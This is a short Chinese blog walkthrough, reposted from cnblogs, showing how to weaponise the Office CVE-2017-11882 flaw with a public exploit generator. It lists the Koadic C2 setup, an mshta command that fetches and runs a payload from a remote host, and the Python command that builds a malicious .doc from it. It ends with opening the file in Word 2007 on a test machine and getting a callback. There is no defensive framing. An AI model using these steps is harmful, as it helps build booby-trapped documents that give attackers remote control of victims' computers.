项目地址:https://github.com/iBearcat/CVE-2017-11882
首先开启koadic,然后配置一下

复制这句代码
mshta http://192.168.220.132:9999/dHem0
 然后生成doc文件
┌─[[email protected]]─[/sch01ar/CVE-2017-11882]
└──╼ #python Command_CVE-2017-11882.py -c "mshta http://192.168.220.132:9999/dHem0" -o sch01ar.doc

注:命令长度不能超过43 bytes

然后拿到靶机里测试

打开文件(word测试版本位2007)

目标主机反弹成功


原文地址:https://www.cnblogs.com/sch01ar/p/7875726.html